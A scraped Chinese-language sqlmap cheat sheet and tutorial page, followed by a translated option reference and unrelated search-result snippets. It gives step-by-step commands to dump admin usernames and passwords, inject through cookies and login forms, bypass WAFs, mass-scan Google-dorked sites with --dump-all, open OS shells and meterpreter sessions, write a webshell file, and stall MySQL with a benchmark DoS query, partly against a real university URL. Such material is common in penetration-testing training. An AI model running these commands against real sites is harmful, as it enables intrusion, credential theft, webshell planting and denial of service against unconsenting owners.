    sqlmap -u “http://url/news?id=1” –os-pwn / 反弹 shell
    sqlmap -u “http://url/news?id=1” –reg-read / 读取 win 系统注册表
    sqlmap -u “http://url/news?id=1” –dbs-o “sqlmap.log”/ 保存进度
    sqlmap -u “http://url/news?id=1” –dbs -o “sqlmap.log” –resume /* 恢复 已保存进度


    高级用法

    表单

    表单枚举

    sqlmap -u “http://www.xxx.com” --forms

    指定表单数据

    sqlmap -u “http://www.xxx.com” --data “tfUName=1&UPass=1”
    burpsuite 抓包与构造 request 请求
    sqlmap -r search_test -p tfUPass

    交互式 shell

    sqlmap -u “http://www.xxx.com” --os-cmd “ipconfig”
    sqlmap -u “http://www.xxx.com” --os-shell
    sqlmap -u “http://www.xxx.com” --os-pwn
    sqlmap -u “http://www.xxx.com” --sql-shell
    php 提供上传页面, 使用 shell 可提权。

    伪静态注入

    “http://sfl.fzu.edu.cn/index.php/Index/view/id/40.html”
    sqlmap -u “http://sfl.fzu.edu.cn/index.php/Index/view/id/40*.html”
    google hacking
    -p name / 多个参数如 index.php?n_id=1&name=2&data=2020 我们想指定 name 参数进行注入
    sqlmap -g “site:xxxxx.com inurl:php?id=” –dump-all –batch /google 搜索注入点自动跑出所有字段,需保证 google.com 能正常访问

    DoS Attack

    在 sql shell 中执行
    使用特定 sql 导致数据库报错停止运行
    select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)

    WAF bypass

    –batch Never ask for user input, use the default behaviour
    –tamper=TAMPER Use given script(s) for tampering injection data
    常见 encoder: space2hash, space2morehash, base64encode, charencode
    示例
    sqlmap -u “http://www.xxx.com” -v 3 --dbs --batch --tamper “space2hash”

    权限查看

    –privileges Enumerate DBMS users privileges
    示例
    sqlmap -u “http://www.xxx.com” --privileges

    展开全文
  • 11种常见SQLMAP使用方法详解

    万次阅读 2017-01-28 06:43:51
    一、SQLMAP用于Access数据库注入 (1) 猜解是否能注入 [AppleScript] 纯文本查看 复制代码 ? 1 2 win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" Linux : .lmap


    一、SQLMAP用于Access数据库注入


    (1) 猜解是否能注入

    win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"
    Linux : .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7"


    (2) 猜解表
    win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables
    Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --tables



    (3) 根据猜解的表进行猜解表的字段(假如通过2得到了admin这个表)

    win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin
    Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --columns -T admin


    (4) 根据字段猜解内容(假如通过3得到字段为username和password)
    win: python sqlmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"
    Linux: .lmap.py -u "http://www.xxx.com/en/CompHonorBig.asp?id=7" --dump -T admin -C "username,password"



    二、SQLMAP用于Cookie注入


    (1) cookie注入,猜解表
    win : python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --table --level 2


    (2) 猜解字段,(通过1的表猜解字段,假如表为admin)
    win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --columns -T admin --level 2


    (3) 猜解内容
    win :python sqlmap.py -u "http://www.xxx.org/jsj/shownews.asp" --cookie "id=31" --dump -T admin -C "username,password" --level 2



    三、SQLMAP用于mysql中DDOS攻击(1) 获取一个Shell

    win:
    python sqlmap.py -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell
    Linux:
    sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --sql-shell


    (2) 输入执行语句完成DDOS攻击

    select benchmark(99999999999,0x70726f62616e646f70726f62616e646f70726f62616e646f)




    四、SQLMAP用于mysql注入

    (1) 查找数据库
    python sqlmap.py -u "http://www.xxx.com/link.php?id=321" --dbs


    (2) 通过第一步的数据库查找表(假如数据库名为dataname)
    python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname --tables


    (3) 通过2中的表得出列名(假如表为table_name)
    python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name --columns


    (4) 获取字段的值(假如扫描出id,user,password字段)

    python sqlmap.py -u "http://www.xxx.com/link.php?id=321" -D dataname -T table_name -C "id,user,password" --dump





    五、SQLMAP中post登陆框注入

    (1) 其中的search-test.txt是通过抓包工具burp suite抓到的包并把数据保存为这个txt文件
    我们在使用Sqlmap进行post型注入时,经常会出现请求遗漏导致注入失败的情况。这里分享一个小技巧,即结合burpsuite来使用sqlmap,用这种方法进行post注入测试会更准确,操作起来也非常容易。


    1. 浏览器打开目标地址http:// www.xxx.com /Login.asp


    2. 配置burp代理(127.0.0.1:8080)以拦截请求


    3. 点击login表单的submit按钮


    4. 这时候Burp会拦截到了我们的登录POST请求


    5. 把这个post请求复制为txt, 我这命名为search-test.txt 然后把它放至sqlmap目录下


    6. 运行sqlmap并使用如下命令:

    ./sqlmap.py -r search-test.txt -p tfUPass

    这里参数-r 是让sqlmap加载我们的post请求rsearch-test.txt,而-p 大家应该比较熟悉,指定注入用的参数。


    注入点:http://testasp.vulnweb.com/Login.asp


    几种注入方式:./sqlmap.py -r search-test.txt -p tfUPass


    (2) 自动的搜索

    sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --forms


    (3) 指定参数搜索

    sqlmap -u [url]http://testasp.vulnweb.com/Login.asp[/url] --data "tfUName=321&tfUPass=321"




    六、SQLMAP中Google搜索注入

    inurl后面的语言是由自己定的

    注入过程中如果选y是注入,如果不是选n

    sqlmap -g inurl:php?id=




    七、SQLMAP中的请求延迟

    参数 --delay --safe-freq

    python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --delay 1
    python sqlmap.py --dbs -u "http://xxx.cn/index.php/Index/view/id/40.html" --safe-freq 3




    八、SQLMAP绕过WAF防火墙

    注入点:http://192.168.159.1/news.php?id=1

    sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] -v 3 --dbs --batch --tamper "space2morehash.py"

    space2morehash.py中可以替换space2hash.py或者base64encode.py或者charencode.py

    都是编码方式

    space2hash.py base64encode.py charencode.py



    九、SQLMAP查看权限

    sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --privileges


    十、SQLMAP伪静态注入(1) 查找数据库

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" --dbs


    (2) 通过1中的数据库查找对应的表 (假如通过1,得到的是dataname)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname --tables


    (3) 通过2中的数据表得到字段(假如得到的是tablename表)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename --columns


    (4) 通过3得到字段值(假如从3中得到字段id,password)

    python sqlmap.py -u "http://xxx.cn/index.php/Index/view/id/40.html" -D dataname -T tablename -C "password" --dump




    十一、SQLMAP注入点执行命令与交互写shell 


    (1) 注入点:http://192.168.159.1/news.php?id=1


    此处采用的是Linux系统

    sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --os-cmd=ipconfig

    出现语言的选择根据实际的测试网站选择语言

    指定目标站点D:/www/ 


    (2) 获取Shell

    sqlmap -u [url]http://192.168.159.1/news.php?id=1[/url] --os-shell

    出现语言的选择根据实际的测试网站选择语言


    指定目标站点D:/www/

    输入ipconfig/all

    创建用户和删除用户

    只要权限足够大,你可以输入使用任何命令。

    其他命令参考下面:


    从数据库中搜索字段

    sqlmap -r “c:\tools\request.txt” –dbms mysql -D dedecms –search -C admin,password

    在dedecms数据库中搜索字段admin或者password。



    读取与写入文件

    首先找需要网站的物理路径,其次需要有可写或可读权限。


    –file-read=RFILE 从后端的数据库管理系统文件系统读取文件 (物理路径)

    –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件 (mssql xp_shell)

    –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径

    sqlmap -r “c:\request.txt” -p id –dbms mysql –file-dest “e:\php\htdocs\dvwa\inc\include\1.php” –file-write “f:\webshell\1112.php”


    使用shell命令:

    sqlmap -r “c:\tools\request.txt” -p id –dms mysql –os-shell


    接下来指定网站可写目录:


    “E:\php\htdocs\dvwa”

    #注:mysql不支持列目录,仅支持读取单个文件。sqlserver可以列目录,不能读写文件,但需要一个(xp_dirtree函数)




    sqlmap详细命令:

    • -is-dba 当前用户权限(是否为root权限)

    • -dbs 所有数据库

    • -current-db 网站当前数据库

    • -users 所有数据库用户

    • -current-user 当前数据库用户

    • -random-agent 构造随机user-agent

    • -passwords 数据库密码

    • -proxy http://local:8080 –threads 10 (可以自定义线程加速) 代理

    • -time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)



    Options(选项):
    • -version 显示程序的版本号并退出
    • -h, –help 显示此帮助消息并退出
    • -v VERBOSE 详细级别:0-6(默认为1)


    Target(目标):

    以下至少需要设置其中一个选项,设置目标URL。


    • -d DIRECT 直接连接到数据库。
    • -u URL, –url=URL 目标URL。
    • -l LIST 从Burp或WebScarab代理的日志中解析目标。
    • -r REQUESTFILE 从一个文件中载入HTTP请求。
    • -g GOOGLEDORK 处理Google dork的结果作为目标URL。
    • -c CONFIGFILE 从INI配置文件中加载选项。




    Request(请求):

    这些选项可以用来指定如何连接到目标URL。


    • -data=DATA 通过POST发送的数据字符串
    • -cookie=COOKIE HTTP Cookie头
    • -cookie-urlencode URL 编码生成的cookie注入
    • -drop-set-cookie 忽略响应的Set – Cookie头信息
    • -user-agent=AGENT 指定 HTTP User – Agent头
    • -random-agent 使用随机选定的HTTP User – Agent头
    • -referer=REFERER 指定 HTTP Referer头
    • -headers=HEADERS 换行分开,加入其他的HTTP头
    • -auth-type=ATYPE HTTP身份验证类型(基本,摘要或NTLM)(Basic, Digest or NTLM)
    • -auth-cred=ACRED HTTP身份验证凭据(用户名:密码)
    • -auth-cert=ACERT HTTP认证证书(key_file,cert_file)
    • -proxy=PROXY 使用HTTP代理连接到目标URL
    • -proxy-cred=PCRED HTTP代理身份验证凭据(用户名:密码)
    • -ignore-proxy 忽略系统默认的HTTP代理
    • -delay=DELAY 在每个HTTP请求之间的延迟时间,单位为秒
    • -timeout=TIMEOUT 等待连接超时的时间(默认为30秒)
    • -retries=RETRIES 连接超时后重新连接的时间(默认3)
    • -scope=SCOPE 从所提供的代理日志中过滤器目标的正则表达式
    • -safe-url=SAFURL 在测试过程中经常访问的url地址
    • -safe-freq=SAFREQ 两次访问之间测试请求,给出安全的URL




    Enumeration(枚举):

    这些选项可以用来列举后端数据库管理系统的信息、表中的结构和数据。此外,您还可以运行您自己的SQL语句。

    • -b, –banner 检索数据库管理系统的标识
    • -current-user 检索数据库管理系统当前用户
    • -current-db 检索数据库管理系统当前数据库
    • -is-dba 检测DBMS当前用户是否DBA
    • -users 枚举数据库管理系统用户
    • -passwords 枚举数据库管理系统用户密码哈希
    • -privileges 枚举数据库管理系统用户的权限
    • -roles 枚举数据库管理系统用户的角色
    • -dbs 枚举数据库管理系统数据库
    • -D DBname 要进行枚举的指定数据库名
    • -T TBLname 要进行枚举的指定数据库表(如:-T tablename –columns)
    • -tables 枚举的DBMS数据库中的表
    • -columns 枚举DBMS数据库表列
    • -dump 转储数据库管理系统的数据库中的表项
    • -dump-all 转储所有的DBMS数据库表中的条目
    • -search 搜索列(S),表(S)和/或数据库名称(S)
    • -C COL 要进行枚举的数据库列
    • -U USER 用来进行枚举的数据库用户
    • -exclude-sysdbs 枚举表时排除系统数据库
    • -start=LIMITSTART 第一个查询输出进入检索
    • -stop=LIMITSTOP 最后查询的输出进入检索
    • -first=FIRSTCHAR 第一个查询输出字的字符检索
    • -last=LASTCHAR 最后查询的输出字字符检索
    • -sql-query=QUERY 要执行的SQL语句
    • -sql-shell 提示交互式SQL的shell





    Optimization(优化):

    这些选项可用于优化SqlMap的性能。


    • -o 开启所有优化开关
    • –predict-output 预测常见的查询输出
    • –keep-alive 使用持久的HTTP(S)连接
    • –null-connection 从没有实际的HTTP响应体中检索页面长度
    • –threads=THREADS 最大的HTTP(S)请求并发量(默认为1)


    Injection(注入):

    这些选项可以用来指定测试哪些参数, 提供自定义的注入payloads和可选篡改脚本。


    • -p TESTPARAMETER 可测试的参数(S)
    • –dbms=DBMS 强制后端的DBMS为此值
    • –os=OS 强制后端的DBMS操作系统为这个值
    • –prefix=PREFIX 注入payload字符串前缀
    • –suffix=SUFFIX 注入payload字符串后缀
    • –tamper=TAMPER 使用给定的脚本(S)篡改注入数据


    Detection(检测):

    这些选项可以用来指定在SQL盲注时如何解析和比较HTTP响应页面的内容。

    • –level=LEVEL 执行测试的等级(1-5,默认为1)
    • –risk=RISK 执行测试的风险(0-3,默认为1)
    • –string=STRING 查询时有效时在页面匹配字符串
    • –regexp=REGEXP 查询时有效时在页面匹配正则表达式
    • –text-only 仅基于在文本内容比较网页


    Techniques(技巧):

    这些选项可用于调整具体的SQL注入测试。

    • –technique=TECH SQL注入技术测试(默认BEUST)
    • –time-sec=TIMESEC DBMS响应的延迟时间(默认为5秒)
    • –union-cols=UCOLS 定列范围用于测试UNION查询注入
    • –union-char=UCHAR 用于暴力猜解列数的字符


    Fingerprint(指纹):
    • -f, –fingerprint 执行检查广泛的DBMS版本指纹



    Brute force(蛮力):

    这些选项可以被用来运行蛮力检查。

    • –common-tables 检查存在共同表

    • –common-columns 检查存在共同列



    User-defined function injection(用户自定义函数注入):


    这些选项可以用来创建用户自定义函数。

    –udf-inject 注入用户自定义函数

    –shared-lib=SHLIB 共享库的本地路径



    File system access(访问文件系统):

    这些选项可以被用来访问后端数据库管理系统的底层文件系统。


    • –file-read=RFILE 从后端的数据库管理系统文件系统读取文件
    • –file-write=WFILE 编辑后端的数据库管理系统文件系统上的本地文件
    • –file-dest=DFILE 后端的数据库管理系统写入文件的绝对路径



    Operating system access(操作系统访问):

    这些选项可以用于访问后端数据库管理系统的底层操作系统。


    • –os-cmd=OSCMD 执行操作系统命令
    • –os-shell 交互式的操作系统的shell
    • –os-pwn 获取一个OOB shell,meterpreter或VNC
    • –os-smbrelay 一键获取一个OOB shell,meterpreter或VNC
    • –os-bof 存储过程缓冲区溢出利用
    • –priv-esc 数据库进程用户权限提升
    • –msf-path=MSFPATH Metasploit Framework本地的安装路径
    • –tmp-path=TMPPATH 远程临时文件目录的绝对路径


    Windows注册表访问:

    这些选项可以被用来访问后端数据库管理系统Windows注册表。


    • –reg-read 读一个Windows注册表项值
    • –reg-add 写一个Windows注册表项值数据
    • –reg-del 删除Windows注册表键值
    • –reg-key=REGKEY Windows注册表键
    • –reg-value=REGVAL Windows注册表项值
    • –reg-data=REGDATA Windows注册表键值数据
    • –reg-type=REGTYPE Windows注册表项值类型
    • 这些选项可以用来设置一些一般的工作参数。
    • -t TRAFFICFILE 记录所有HTTP流量到一个文本文件中
    • -s SESSIONFILE 保存和恢复检索会话文件的所有数据
    • –flush-session 刷新当前目标的会话文件
    • –fresh-queries 忽略在会话文件中存储的查询结果
    • –eta 显示每个输出的预计到达时间
    • –update 更新SqlMap
    • –save file保存选项到INI配置文件
    • –batch 从不询问用户输入,使用所有默认配置。


    Miscellaneous(杂项):
    • –beep 发现SQL注入时提醒
    • –check-payload IDS对注入payloads的检测测试
    • –cleanup SqlMap具体的UDF和表清理DBMS
    • –forms 对目标URL的解析和测试形式
    • –gpage=GOOGLEPAGE 从指定的页码使用谷歌dork结果
    • –page-rank Google dork结果显示网页排名(PR)
    • –parse-errors 从响应页面解析数据库管理系统的错误消息
    • –replicate 复制转储的数据到一个sqlite3数据库
    • –tor 使用默认的Tor(Vidalia/ Privoxy/ Polipo)代理地址
    • –wizard 给初级用户的简单向导界面

    展开全文
  • 阿里云RDS导出数据库结构整理工具

    万次阅读 2018-01-07 13:28:20
    本文使用shell实现一个小工具,可以整理阿里云RDS导出数据库结构的zip文件,整理为可直接使用的sql文件。 阿里云RDS导出的数据库结构sql需要整理的地方 1.解压后sql文件名称缺少数据库名称标识 阿里云RDS导出...
  • 在被黑站点找到一个站 先教拿shell是有注入漏洞的 有可能是root权限的注入点 可以确定是有注入漏洞的 也得到了 物理路径 这个是很有用的 如果是root权限的注入点 那我们可以考虑 写shellD:\wamp\...
  • Sqlmap使用详解

    万次阅读 多人点赞 2020-07-14 17:43:48
    目录 Sqlmap Sqlmap的简单用法 探测指定URL是否存在SQL注入漏洞 查看数据库的所有用户 ...查看数据库当前用户 ...列出数据库管理员角色 ...爆出指定数据库指定表指定列下的数据 爆出该网站数据库中的所有数据 ...
  • Impala的简单入门

    万次阅读 2018-07-06 16:51:23
    Impala是用于处理存储在Hadoop集群中的大量数据的MPP(大规模并行处理)SQL查询引擎。 它是一个用C ++和Java编写的开源软件。 与其他Hadoop的SQL引擎相比,它提供了高性能和低延迟。换句话说,Impala是性能最高的SQL...
  • Sqlmap基础命令介绍及常用命令

    万次阅读 2018-01-16 16:31:51
    sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables sqlmap.py -u 登录的地址 --forms 自动判断注入 sqlmap.py -u 登录的地址 --data "指定参数" 绕过waf防火墙:sqlmap.py -u 注入点 -v 3 --dbs -...
  • 数据库读取换行的字符串

    千次阅读 2013-08-05 15:08:16
    数据库读取换行的字符串
  • sqlmap的基本命令使用

    万次阅读 2016-03-24 19:27:02
    本人小白,初次认识sqlmap,很多都是转载资料,只是学习研究一下! 练习的网站可以用谷歌搜一下; ...POST登录框注入:sqlmap.py -r 从文件读取数据 -p 指定的参数 --tables  sqlmap.py -u 登
  • MySQL提权篇

    万次阅读 2018-05-12 11:36:50
    服务器安装Mysql数据库利用Mysql提权的前提就是服务器安装了mysql数据库,且mysql的服务没有降权,Mysql数据库默认安装是以系统权限继承的,并且需要获取Mysql root账号密码。2.判断Mysql服务运行权限对于Mysql...
  • Shell产生随机数或随机字符串

    千次阅读 2014-11-26 17:24:28
    1、生成随机数  echo $RANDOM 2、生成随机字符串  cat /dev/urandom | strings -n C | head -n L 生成全字符的随机字符串 ... cat /dev/urandom | sed 's/[^a-zA-Z0-9]//g' ... | strings -n C | head -n L ...
  • sqlmap 学习必会
  • SQLite语法 BEGIN TRANSACTION

    千次阅读 2009-10-14 19:46:00
    BEGIN TRANSACTIONsql-statement ::=BEGIN [ DEFERRED | IMMEDIATE | EXCLUSIVE ] [TRANSACTION [name]]sql-statement ::=END [TRANSACTI
  • SQLServer数据库注入详解

    千次阅读 2020-08-04 11:40:27
    SQLServer数据库 修改默认1433端口 SQLServer数据库的管理 SQLServer数据库的查询语句 SA权限开启xp_cmdshell获取主机权限 SA权限使用sp_oacreate执行系统命令 DB_owner权限LOG备份Getshell DB_owner权限差异...
  • 利用任意文件读取漏洞Getshell 目录浏览(目录遍历)漏洞 目录浏览漏洞是由于网站存在配置缺陷,导致网站目录可以被任意浏览,这会导致网站很多隐私文件与目录泄露,比如数据库备份文件、配置文件等,攻击者利用该...
  • Sqlmap使用教程【超全】

    千次阅读 2017-05-11 10:55:39
    sqlmap也是渗透中常用的一个注入工具,其实在注入工具方面,一个sqlmap就足够用了,只要你用的熟,秒杀各种工具,只是一个便捷性问题,sql注入另一方面就是手工党了,这个就另当别论了。 今天把我一直以来整理的...
  • MongoDB创建数据库管理员账号

    千次阅读 2014-03-03 13:11:12
    启动MongoDB服务时,在没有指定--auth参数情况下...启动MongoDB服务,进入MongoDB Shell控制台,切换至admin数据库,创建数据库管理员用户,其指令如下(以#开头的为注释说明,非输入控制台内容,每条指令以Enter键结束
  • 一、数据库基本概念 数据库(DB) 按照数据结构来组织、存储数据的仓库 数据库管理系统(DBMS) 数据库管理系统(Database Management System)是一套操纵和管理数据库的软件,是用于建立、使用和维护数据库 ...
1 2 3 4 5 ... 20
收藏数 17,268
精华内容 6,907
关键字:

php shell连接数据库读取数据